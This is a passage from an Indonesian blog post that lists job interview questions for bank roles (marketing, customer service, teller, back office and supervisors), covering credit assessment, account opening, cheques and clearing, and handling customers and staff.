    1. Apakah yang anda ketahui tentang marketing secara umum ? Dan marketing khusus untuk perbankan ?
    2. Seandainya anda menjadi seorang petugas marketing, bagaimana cara anda mencari nasabah ?
    3. Syarat-syarat apa saja yang ditetapkan oleh bank untuk mendapatkan pinjaman ?
    4. Untuk memperkecil resiko kredit, maka permohonan kredit harus dinilai oleh bank. Jelaskan yang dimaksud dengan 5 C ?
    5. Jelaskan apa yang dimaksud dengan f.e.o., dan gadai ?
    Bidang Costumer Sevice (CS)
    1. Sebutkan dan jelaskan tugas-tugas CS (Costumer Sevice) secara umum. Dan tugas-tugas CS di perbankan.
    2. Bagaimana menurut anda sikap Costumer Sevice yang baik ?
    3. Bagaimana sikap anda jika menghadapi nasabah yang banyak menuntut ?
    4. Bagaimana sikap anda bila ada nasabah yang ingin menutup rekeningnya, padahal nasabah tersebut merupakan prime customer ?
    5. Hal-hal apa saja menurut anda yang perlu dirahasiakan terhadap sesama karyawan maupun pihak lain ?
    6. Sebutkan syarat-syarat untuk pembukaan rekening perorangan. Kemudian sebutkan untuk rekening perusahaan.
    7. Bagaimana sikap anda saat atasan menegur anda ?
    Bidang Teller
    1. Sebutkan dan jelaskan tugas-tugas Teller.
    2. Bagaimana menurut anda sikap Teller yang baik ?
    3. Jelaskan perbedaan cek dengan BG.
    4. Jelaskan ciri-ciri uang palsu.
    Back Office Processing (BOP)
    1. Sebutkan dan jelaskan perbedaan bank umum dengan bank perkreditan rakyat.
    2. Jelaskan mengenai kliring.
    3. Jelaskan perbedaan cek dengan BG.
    4. Hal-hal apa saja menurut anda yang perlu dirahasiakan terhadap sesama karyawan maupun pihak lain ?
    Pimpinan/Kepala CS atau Teller atau BOP
    1. Seandainya anda menjadi pimpinan, ceritakan hal-hal apa saja yang anda lakukan bila ada karyawan baru yang menjadi bawahan anda.
    2. Seandainya anda menjadi pimpinan, jelaskan apa yang akan anda lakukan jika bawahan anda malas dan tidak efisien.
    3. Seandainya anda menjadi pimpinan, ceritakan tindakan-tindakan apa yang anda lakukan dalam membimbing, mengarahkan, dan memotivasi bawahan anda.
    4. Seandainya anda menjadi pimpinan, bagaimana sikap anda bila ada bawahan yang sering terlambat ?
    Sumber : gilland-ganesha.com, buku "Sukses Mendapatkan Pekerjaan" - Anna T. Yuniarti, S.Psi.
  • Digg
  • Delicious
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • StumbleUpon
  • Technorati
  • 6ELB © 2008. Design by :Yanku Templates Sponsored by: Tutorial87 Commentcute